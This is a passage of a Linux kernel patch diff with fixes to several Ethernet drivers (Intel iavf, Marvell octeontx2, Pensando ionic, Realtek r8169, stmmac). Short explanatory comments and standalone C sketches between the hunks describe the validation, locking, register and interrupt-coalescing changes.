+-			netif_info(adapter, drv, netdev, "tx-usecs=0, need to disable adaptive-tx for a complete disable\n");
+-	} else if ((ec->tx_coalesce_usecs < IAVF_MIN_ITR) ||
+-		   (ec->tx_coalesce_usecs > IAVF_MAX_ITR)) {
++	} else if (ec->tx_coalesce_usecs > IAVF_MAX_ITR) {
+ 		netif_info(adapter, drv, netdev, "Invalid value, tx-usecs range is 0-8160\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.h b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+index 7e6ee32d19b69..10ba36602c0c1 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+@@ -15,7 +15,6 @@
+  */
+ #define IAVF_ITR_DYNAMIC	0x8000	/* use top bit as a flag */
+ #define IAVF_ITR_MASK		0x1FFE	/* mask for ITR register value */
+-#define IAVF_MIN_ITR		     2	/* reg uses 2 usec resolution */
+ #define IAVF_ITR_100K		    10	/* all values below must be even */
+ #define IAVF_ITR_50K		    20
+ #define IAVF_ITR_20K		    50
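
With IAVF_MIN_ITR gone, the iavf change legalizes an ITR of 0: the old code rejected anything below the minimum unless adaptive mode was also disabled, while the new check only enforces the upper bound (0-8160 per the driver's own message). As a pure validation sketch:

    #include <stdio.h>

    #define IAVF_MAX_ITR 8160

    /* 0 is now a valid setting (interrupt throttling fully off);
     * only values above the hardware maximum are rejected. */
    static int validate_itr(unsigned usecs)
    {
        return usecs > IAVF_MAX_ITR ? -22 /* -EINVAL */ : 0;
    }

    int main(void)
    {
        printf("%d %d %d\n", validate_itr(0), validate_itr(50), validate_itr(9000));
        return 0;
    }
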
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index a0c31f5b2ce05..03ebabd616353 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -1877,7 +1877,7 @@ struct mcs_hw_info {
+ 	u8 tcam_entries;	/* RX/TX Tcam entries per mcs block */
+ 	u8 secy_entries;	/* RX/TX SECY entries per mcs block */
+ 	u8 sc_entries;		/* RX/TX SC CAM entries per mcs block */
+-	u8 sa_entries;		/* PN table entries = SA entries */
++	u16 sa_entries;		/* PN table entries = SA entries */
+ 	u64 rsvd[16];
+ };
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index c43f19dfbd744..c1775bd01c2b4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -117,7 +117,7 @@ void mcs_get_rx_secy_stats(struct mcs *mcs, struct mcs_secy_stats *stats, int id
+ 	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYTAGGEDCTLX(id);
+ 	stats->pkt_tagged_ctl_cnt = mcs_reg_read(mcs, reg);
+ 
+-	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDORNOTAGX(id);
++	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDX(id);
+ 	stats->pkt_untaged_cnt = mcs_reg_read(mcs, reg);
+ 
+ 	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYCTLX(id);
+@@ -215,7 +215,7 @@ void mcs_get_sc_stats(struct mcs *mcs, struct mcs_sc_stats *stats,
+ 		reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSCNOTVALIDX(id);
+ 		stats->pkt_notvalid_cnt = mcs_reg_read(mcs, reg);
+ 
+-		reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDOROKX(id);
++		reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDX(id);
+ 		stats->pkt_unchecked_cnt = mcs_reg_read(mcs, reg);
+ 
+ 		if (mcs->hw->mcs_blks > 1) {
+@@ -1219,6 +1219,17 @@ struct mcs *mcs_get_pdata(int mcs_id)
+ 	return NULL;
+ }
+ 
++bool is_mcs_bypass(int mcs_id)
++{
++	struct mcs *mcs_dev;
++
++	list_for_each_entry(mcs_dev, &mcs_list, mcs_list) {
++		if (mcs_dev->mcs_id == mcs_id)
++			return mcs_dev->bypass;
++	}
++	return true;
++}
++
+ void mcs_set_port_cfg(struct mcs *mcs, struct mcs_port_cfg_set_req *req)
+ {
+ 	u64 val = 0;
+@@ -1436,7 +1447,7 @@ static int mcs_x2p_calibration(struct mcs *mcs)
+ 	return err;
+ }
+ 
+-static void mcs_set_external_bypass(struct mcs *mcs, u8 bypass)
++static void mcs_set_external_bypass(struct mcs *mcs, bool bypass)
+ {
+ 	u64 val;
+ 
+@@ -1447,6 +1458,7 @@ static void mcs_set_external_bypass(struct mcs *mcs, u8 bypass)
+ 	else
+ 		val &= ~BIT_ULL(6);
+ 	mcs_reg_write(mcs, MCSX_MIL_GLOBAL, val);
++	mcs->bypass = bypass;
+ }
+ 
+ static void mcs_global_cfg(struct mcs *mcs)
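
Note that is_mcs_bypass() walks the device list and deliberately defaults to true when the id is not found; the NIX link-credit code later in this patch treats bypass as "no extra MCS credits needed", so the unknown case errs on the side of fewer credits. A sketch of a lookup with a fail-safe default (illustrative types):

    #include <stdbool.h>
    #include <stdio.h>

    struct mcs { int id; bool bypass; };

    static bool is_mcs_bypass(const struct mcs *devs, int n, int id)
    {
        for (int i = 0; i < n; i++)
            if (devs[i].id == id)
                return devs[i].bypass;
        return true;   /* unknown block: assume bypass, the safe default */
    }

    int main(void)
    {
        struct mcs devs[] = { { 0, false } };
        printf("%d %d\n", is_mcs_bypass(devs, 1, 0), is_mcs_bypass(devs, 1, 7));
        return 0;
    }
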
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+index 0f89dcb764654..f927cc61dfd21 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+@@ -149,6 +149,7 @@ struct mcs {
+ 	u16			num_vec;
+ 	void			*rvu;
+ 	u16			*tx_sa_active;
++	bool                      bypass;
+ };
+ 
+ struct mcs_ops {
+@@ -206,6 +207,7 @@ void mcs_get_custom_tag_cfg(struct mcs *mcs, struct mcs_custom_tag_cfg_get_req *
+ int mcs_alloc_ctrlpktrule(struct rsrc_bmap *rsrc, u16 *pf_map, u16 offset, u16 pcifunc);
+ int mcs_free_ctrlpktrule(struct mcs *mcs, struct mcs_free_ctrl_pkt_rule_req *req);
+ int mcs_ctrlpktrule_write(struct mcs *mcs, struct mcs_ctrl_pkt_rule_write_req *req);
++bool is_mcs_bypass(int mcs_id);
+ 
+ /* CN10K-B APIs */
+ void cn10kb_mcs_set_hw_capabilities(struct mcs *mcs);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+index f3ab01fc363c8..f4c6de89002c1 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+@@ -810,14 +810,37 @@
+ 		offset = 0x9d8ull;			\
+ 	offset; })
+ 
++#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDX(a) ({	\
++	u64 offset;					\
++							\
++	offset = 0xee80ull;				\
++	if (mcs->hw->mcs_blks > 1)			\
++		offset = 0xe818ull;			\
++	offset += (a) * 0x8ull;				\
++	offset; })
++
++#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDX(a) ({	\
++	u64 offset;					\
++							\
++	offset = 0xa680ull;				\
++	if (mcs->hw->mcs_blks > 1)			\
++		offset = 0xd018ull;			\
++	offset += (a) * 0x8ull;				\
++	offset; })
++
++#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCLATEORDELAYEDX(a)	({	\
++	u64 offset;						\
++								\
++	offset = 0xf680ull;					\
++	if (mcs->hw->mcs_blks > 1)				\
++		offset = 0xe018ull;				\
++	offset += (a) * 0x8ull;					\
++	offset; })
++
+ #define MCSX_CSE_RX_MEM_SLAVE_INOCTETSSCDECRYPTEDX(a)	(0xe680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INOCTETSSCVALIDATEX(a)	(0xde80ull + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDORNOTAGX(a)	(0xa680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYNOTAGX(a)	(0xd218 + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDX(a)	(0xd018ull + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDOROKX(a)	(0xee80ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYCTLX(a)		(0xb680ull + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCLATEORDELAYEDX(a) (0xf680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSAINVALIDX(a)	(0x12680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSANOTUSINGSAERRORX(a) (0x15680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSANOTVALIDX(a)	(0x13680ull + (a) * 0x8ull)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 733add3a9dc6b..d88d86bf07b03 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -2622,6 +2622,9 @@ static void __rvu_flr_handler(struct rvu *rvu, u16 pcifunc)
+ 	 */
+ 	rvu_npc_free_mcam_entries(rvu, pcifunc, -1);
+ 
++	if (rvu->mcs_blk_cnt)
++		rvu_mcs_flr_handler(rvu, pcifunc);
++
+ 	mutex_unlock(&rvu->flr_lock);
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index a3346ea7876c5..95a7bc396e8ea 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -325,6 +325,7 @@ struct nix_hw {
+ 	struct nix_txvlan txvlan;
+ 	struct nix_ipolicer *ipolicer;
+ 	u64    *tx_credits;
++	u8	cc_mcs_cnt;
+ };
+ 
+ /* RVU block's capabilities or functionality,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+index dc7bd2ce78f7d..d609512998992 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+@@ -1285,7 +1285,7 @@ static int rvu_npa_register_reporters(struct rvu_devlink *rvu_dl)
+ 
+ 	rvu_dl->devlink_wq = create_workqueue("rvu_devlink_wq");
+ 	if (!rvu_dl->devlink_wq)
+-		goto err;
++		return -ENOMEM;
+ 
+ 	INIT_WORK(&rvu_reporters->intr_work, rvu_npa_intr_work);
+ 	INIT_WORK(&rvu_reporters->err_work, rvu_npa_err_work);
+@@ -1293,9 +1293,6 @@ static int rvu_npa_register_reporters(struct rvu_devlink *rvu_dl)
+ 	INIT_WORK(&rvu_reporters->ras_work, rvu_npa_ras_work);
+ 
+ 	return 0;
+-err:
+-	rvu_npa_health_reporters_destroy(rvu_dl);
+-	return -ENOMEM;
+ }
+ 
+ static int rvu_npa_health_reporters_create(struct rvu_devlink *rvu_dl)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 7310047136986..959f36efdc4a6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -12,6 +12,7 @@
+ #include "rvu_reg.h"
+ #include "rvu.h"
+ #include "npc.h"
++#include "mcs.h"
+ #include "cgx.h"
+ #include "lmac_common.h"
+ #include "rvu_npc_hash.h"
+@@ -4164,6 +4165,12 @@ static void nix_link_config(struct rvu *rvu, int blkaddr,
+ 			    SDP_HW_MAX_FRS << 16 | NIC_HW_MIN_FRS);
+ 	}
+ 
++	/* Get MCS external bypass status for CN10K-B */
++	if (mcs_get_blkcnt() == 1) {
++		/* Adjust for 2 credits when external bypass is disabled */
++		nix_hw->cc_mcs_cnt = is_mcs_bypass(0) ? 0 : 2;
++	}
++
+ 	/* Set credits for Tx links assuming max packet length allowed.
+ 	 * This will be reconfigured based on MTU set for PF/VF.
+ 	 */
+@@ -4187,6 +4194,7 @@ static void nix_link_config(struct rvu *rvu, int blkaddr,
+ 			tx_credits = (lmac_fifo_len - lmac_max_frs) / 16;
+ 			/* Enable credits and set credit pkt count to max allowed */
+ 			cfg =  (tx_credits << 12) | (0x1FF << 2) | BIT_ULL(1);
++			cfg |= FIELD_PREP(NIX_AF_LINKX_MCS_CNT_MASK, nix_hw->cc_mcs_cnt);
+ 
+ 			link = iter + slink;
+ 			nix_hw->tx_credits[link] = tx_credits;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 16cfc802e348d..f65805860c8d4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -389,7 +389,13 @@ static u64 npc_get_default_entry_action(struct rvu *rvu, struct npc_mcam *mcam,
+ 	int bank, nixlf, index;
+ 
+ 	/* get ucast entry rule entry index */
+-	nix_get_nixlf(rvu, pf_func, &nixlf, NULL);
++	if (nix_get_nixlf(rvu, pf_func, &nixlf, NULL)) {
++		dev_err(rvu->dev, "%s: nixlf not attached to pcifunc:0x%x\n",
++			__func__, pf_func);
++		/* Action 0 is drop */
++		return 0;
++	}
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pf_func, nixlf,
+ 					 NIXLF_UCAST_ENTRY);
+ 	bank = npc_get_bank(mcam, index);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c
+index b3150f0532919..d46ac29adb966 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c
+@@ -31,8 +31,8 @@ static struct hw_reg_map txsch_reg_map[NIX_TXSCH_LVL_CNT] = {
+ 	{NIX_TXSCH_LVL_TL4, 3, 0xFFFF, {{0x0B00, 0x0B08}, {0x0B10, 0x0B18},
+ 			      {0x1200, 0x12E0} } },
+ 	{NIX_TXSCH_LVL_TL3, 4, 0xFFFF, {{0x1000, 0x10E0}, {0x1600, 0x1608},
+-			      {0x1610, 0x1618}, {0x1700, 0x17B0} } },
+-	{NIX_TXSCH_LVL_TL2, 2, 0xFFFF, {{0x0E00, 0x0EE0}, {0x1700, 0x17B0} } },
++			      {0x1610, 0x1618}, {0x1700, 0x17C8} } },
++	{NIX_TXSCH_LVL_TL2, 2, 0xFFFF, {{0x0E00, 0x0EE0}, {0x1700, 0x17C8} } },
+ 	{NIX_TXSCH_LVL_TL1, 1, 0xFFFF, {{0x0C00, 0x0D98} } },
+ };
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+index 39f7a7cb27558..b690e5566f12a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+@@ -434,6 +434,7 @@
+ 
+ #define NIX_AF_LINKX_BASE_MASK		GENMASK_ULL(11, 0)
+ #define NIX_AF_LINKX_RANGE_MASK		GENMASK_ULL(19, 16)
++#define NIX_AF_LINKX_MCS_CNT_MASK	GENMASK_ULL(33, 32)
+ 
+ /* SSO */
+ #define SSO_AF_CONST			(0x1000)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+index aaf1af2a402ec..af779ae40d3c2 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+@@ -323,9 +323,12 @@ static void otx2_get_pauseparam(struct net_device *netdev,
+ 	if (is_otx2_lbkvf(pfvf->pdev))
+ 		return;
+ 
++	mutex_lock(&pfvf->mbox.lock);
+ 	req = otx2_mbox_alloc_msg_cgx_cfg_pause_frm(&pfvf->mbox);
+-	if (!req)
++	if (!req) {
++		mutex_unlock(&pfvf->mbox.lock);
+ 		return;
++	}
+ 
+ 	if (!otx2_sync_mbox_msg(&pfvf->mbox)) {
+ 		rsp = (struct cgx_pause_frm_cfg *)
+@@ -333,6 +336,7 @@ static void otx2_get_pauseparam(struct net_device *netdev,
+ 		pause->rx_pause = rsp->rx_pause;
+ 		pause->tx_pause = rsp->tx_pause;
+ 	}
++	mutex_unlock(&pfvf->mbox.lock);
+ }
+ 
+ static int otx2_set_pauseparam(struct net_device *netdev,
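
The otx2_get_pauseparam() fix above is a classic lock-pairing bug: the mailbox allocate/send/read sequence must be serialized, and every exit path, including the allocation failure, must drop the mutex. The shape of the fix, as a standalone sketch (compile with -lpthread; the mailbox calls are placeholders):

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t mbox_lock = PTHREAD_MUTEX_INITIALIZER;

    static void *alloc_msg(int fail) { return fail ? NULL : (void *)1; }

    /* Every exit path drops the lock, including the allocation failure
     * that would otherwise leave the mailbox locked for other callers. */
    static void get_pauseparam(int fail_alloc)
    {
        pthread_mutex_lock(&mbox_lock);
        void *req = alloc_msg(fail_alloc);
        if (!req) {
            pthread_mutex_unlock(&mbox_lock);
            return;
        }
        /* ... send the message and read the response here ... */
        pthread_mutex_unlock(&mbox_lock);
    }

    int main(void)
    {
        get_pauseparam(1);
        get_pauseparam(0);
        printf("ok\n");
        return 0;
    }
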
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 18c5d2b3f7f95..55807e2043edf 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1676,6 +1676,14 @@ static void otx2_do_set_rx_mode(struct otx2_nic *pf)
+ 	mutex_unlock(&pf->mbox.lock);
+ }
+ 
++static void otx2_set_irq_coalesce(struct otx2_nic *pfvf)
++{
++	int cint;
++
++	for (cint = 0; cint < pfvf->hw.cint_cnt; cint++)
++		otx2_config_irq_coalescing(pfvf, cint);
++}
++
+ static void otx2_dim_work(struct work_struct *w)
+ {
+ 	struct dim_cq_moder cur_moder;
+@@ -1691,6 +1699,7 @@ static void otx2_dim_work(struct work_struct *w)
+ 		CQ_TIMER_THRESH_MAX : cur_moder.usec;
+ 	pfvf->hw.cq_ecount_wait = (cur_moder.pkts > NAPI_POLL_WEIGHT) ?
+ 		NAPI_POLL_WEIGHT : cur_moder.pkts;
++	otx2_set_irq_coalesce(pfvf);
+ 	dim->state = DIM_START_MEASURE;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 20d801d30c732..aee392a15b23c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -510,11 +510,18 @@ static void otx2_adjust_adaptive_coalese(struct otx2_nic *pfvf, struct otx2_cq_p
+ {
+ 	struct dim_sample dim_sample;
+ 	u64 rx_frames, rx_bytes;
++	u64 tx_frames, tx_bytes;
+ 
+ 	rx_frames = OTX2_GET_RX_STATS(RX_BCAST) + OTX2_GET_RX_STATS(RX_MCAST) +
+ 		OTX2_GET_RX_STATS(RX_UCAST);
+ 	rx_bytes = OTX2_GET_RX_STATS(RX_OCTS);
+-	dim_update_sample(pfvf->napi_events, rx_frames, rx_bytes, &dim_sample);
++	tx_bytes = OTX2_GET_TX_STATS(TX_OCTS);
++	tx_frames = OTX2_GET_TX_STATS(TX_UCAST);
++
++	dim_update_sample(pfvf->napi_events,
++			  rx_frames + tx_frames,
++			  rx_bytes + tx_bytes,
++			  &dim_sample);
+ 	net_dim(&cq_poll->dim, dim_sample);
+ }
+ 
+@@ -555,16 +562,9 @@ int otx2_napi_handler(struct napi_struct *napi, int budget)
+ 		if (pfvf->flags & OTX2_FLAG_INTF_DOWN)
+ 			return workdone;
+ 
+-		/* Check for adaptive interrupt coalesce */
+-		if (workdone != 0 &&
+-		    ((pfvf->flags & OTX2_FLAG_ADPTV_INT_COAL_ENABLED) ==
+-		     OTX2_FLAG_ADPTV_INT_COAL_ENABLED)) {
+-			/* Adjust irq coalese using net_dim */
++		/* Adjust irq coalescing using net_dim */
++		if (pfvf->flags & OTX2_FLAG_ADPTV_INT_COAL_ENABLED)
+ 			otx2_adjust_adaptive_coalese(pfvf, cq_poll);
+-			/* Update irq coalescing */
+-			for (i = 0; i < pfvf->hw.cint_cnt; i++)
+-				otx2_config_irq_coalescing(pfvf, i);
+-		}
+ 
+ 		/* Re-enable interrupts */
+ 		otx2_write64(pfvf, NIX_LF_CINTX_ENA_W1S(cq_poll->cint_idx),
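
Two things change in the otx2 DIM path: the sample fed to net_dim() now counts TX as well as RX traffic, and the coalescing registers are rewritten from the dim work handler (otx2_dim_work) instead of inside the NAPI loop. A compressed sketch of folding both directions into one moderation sample (the helper below is a placeholder, not the net_dim API):

    #include <stdint.h>
    #include <stdio.h>

    struct sample { uint64_t pkts, bytes; };

    /* Placeholder for dim_update_sample(): combine rx and tx so a
     * tx-heavy workload also drives the moderation profile. */
    static struct sample make_sample(uint64_t rx_p, uint64_t rx_b,
                                     uint64_t tx_p, uint64_t tx_b)
    {
        return (struct sample){ rx_p + tx_p, rx_b + tx_b };
    }

    int main(void)
    {
        struct sample s = make_sample(1000, 1500000, 800, 1200000);
        printf("pkts=%llu bytes=%llu\n",
               (unsigned long long)s.pkts, (unsigned long long)s.bytes);
        return 0;
    }
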
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index 93a4258421667..13dfcf9f75dad 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -214,7 +214,7 @@ struct ionic_desc_info {
+ 	void *cb_arg;
+ };
+ 
+-#define IONIC_QUEUE_NAME_MAX_SZ		32
++#define IONIC_QUEUE_NAME_MAX_SZ		16
+ 
+ struct ionic_queue {
+ 	struct device *dev;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index a89ab455af67d..f7634884c7508 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -46,24 +46,24 @@ static void ionic_lif_queue_identify(struct ionic_lif *lif);
+ static void ionic_dim_work(struct work_struct *work)
+ {
+ 	struct dim *dim = container_of(work, struct dim, work);
++	struct ionic_intr_info *intr;
+ 	struct dim_cq_moder cur_moder;
+ 	struct ionic_qcq *qcq;
++	struct ionic_lif *lif;
+ 	u32 new_coal;
+ 
+ 	cur_moder = net_dim_get_rx_moderation(dim->mode, dim->profile_ix);
+ 	qcq = container_of(dim, struct ionic_qcq, dim);
+-	new_coal = ionic_coal_usec_to_hw(qcq->q.lif->ionic, cur_moder.usec);
++	lif = qcq->q.lif;
++	new_coal = ionic_coal_usec_to_hw(lif->ionic, cur_moder.usec);
+ 	new_coal = new_coal ? new_coal : 1;
+ 
+-	if (qcq->intr.dim_coal_hw != new_coal) {
+-		unsigned int qi = qcq->cq.bound_q->index;
+-		struct ionic_lif *lif = qcq->q.lif;
+-
+-		qcq->intr.dim_coal_hw = new_coal;
++	intr = &qcq->intr;
++	if (intr->dim_coal_hw != new_coal) {
++		intr->dim_coal_hw = new_coal;
+ 
+ 		ionic_intr_coal_init(lif->ionic->idev.intr_ctrl,
+-				     lif->rxqcqs[qi]->intr.index,
+-				     qcq->intr.dim_coal_hw);
++				     intr->index, intr->dim_coal_hw);
+ 	}
+ 
+ 	dim->state = DIM_START_MEASURE;
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index abfa375b08878..d22457f2cf9cf 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -193,6 +193,7 @@ enum rtl_registers {
+ 					/* No threshold before first PCI xfer */
+ #define	RX_FIFO_THRESH			(7 << RXCFG_FIFO_SHIFT)
+ #define	RX_EARLY_OFF			(1 << 11)
++#define	RX_PAUSE_SLOT_ON		(1 << 11)	/* 8125b and later */
+ #define	RXCFG_DMA_SHIFT			8
+ 					/* Unlimited maximum PCI burst. */
+ #define	RX_DMA_BURST			(7 << RXCFG_DMA_SHIFT)
+@@ -2237,9 +2238,13 @@ static void rtl_init_rxcfg(struct rtl8169_private *tp)
+ 	case RTL_GIGA_MAC_VER_40 ... RTL_GIGA_MAC_VER_53:
+ 		RTL_W32(tp, RxConfig, RX128_INT_EN | RX_MULTI_EN | RX_DMA_BURST | RX_EARLY_OFF);
+ 		break;
+-	case RTL_GIGA_MAC_VER_61 ... RTL_GIGA_MAC_VER_63:
++	case RTL_GIGA_MAC_VER_61:
+ 		RTL_W32(tp, RxConfig, RX_FETCH_DFLT_8125 | RX_DMA_BURST);
+ 		break;
++	case RTL_GIGA_MAC_VER_63:
++		RTL_W32(tp, RxConfig, RX_FETCH_DFLT_8125 | RX_DMA_BURST |
++			RX_PAUSE_SLOT_ON);
++		break;
+ 	default:
+ 		RTL_W32(tp, RxConfig, RX128_INT_EN | RX_DMA_BURST);
+ 		break;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+index e95d35f1e5a0c..8fd167501fa0e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+@@ -710,28 +710,22 @@ void dwmac5_est_irq_status(void __iomem *ioaddr, struct net_device *dev,
+ 	}
+ }
+ 
+-void dwmac5_fpe_configure(void __iomem *ioaddr, u32 num_txq, u32 num_rxq,
++void dwmac5_fpe_configure(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			  u32 num_txq, u32 num_rxq,
+ 			  bool enable)
+ {
+ 	u32 value;
+ 
+-	if (!enable) {
+-		value = readl(ioaddr + MAC_FPE_CTRL_STS);
+-
+-		value &= ~EFPE;
+-
+-		writel(value, ioaddr + MAC_FPE_CTRL_STS);
+-		return;
++	if (enable) {
++		cfg->fpe_csr = EFPE;
++		value = readl(ioaddr + GMAC_RXQ_CTRL1);
++		value &= ~GMAC_RXQCTRL_FPRQ;
++		value |= (num_rxq - 1) << GMAC_RXQCTRL_FPRQ_SHIFT;
++		writel(value, ioaddr + GMAC_RXQ_CTRL1);
++	} else {
++		cfg->fpe_csr = 0;
+ 	}
+-
+-	value = readl(ioaddr + GMAC_RXQ_CTRL1);
+-	value &= ~GMAC_RXQCTRL_FPRQ;
+-	value |= (num_rxq - 1) << GMAC_RXQCTRL_FPRQ_SHIFT;
+-	writel(value, ioaddr + GMAC_RXQ_CTRL1);
+-
+-	value = readl(ioaddr + MAC_FPE_CTRL_STS);
+-	value |= EFPE;
+-	writel(value, ioaddr + MAC_FPE_CTRL_STS);
++	writel(cfg->fpe_csr, ioaddr + MAC_FPE_CTRL_STS);
+ }
+ 
+ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev)
+@@ -741,6 +735,9 @@ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev)
+ 
+ 	status = FPE_EVENT_UNKNOWN;
+ 
++	/* Reads from the MAC_FPE_CTRL_STS register should only be performed
++	 * here, since the status flags of MAC_FPE_CTRL_STS are "clear on read".
++	 */
+ 	value = readl(ioaddr + MAC_FPE_CTRL_STS);
+ 
+ 	if (value & TRSP) {
+@@ -766,19 +763,15 @@ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev)
+ 	return status;
+ }
+ 
+-void dwmac5_fpe_send_mpacket(void __iomem *ioaddr, enum stmmac_mpacket_type type)
++void dwmac5_fpe_send_mpacket(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			     enum stmmac_mpacket_type type)
+ {
+-	u32 value;
++	u32 value = cfg->fpe_csr;
+ 
+-	value = readl(ioaddr + MAC_FPE_CTRL_STS);
+-
+-	if (type == MPACKET_VERIFY) {
+-		value &= ~SRSP;
++	if (type == MPACKET_VERIFY)
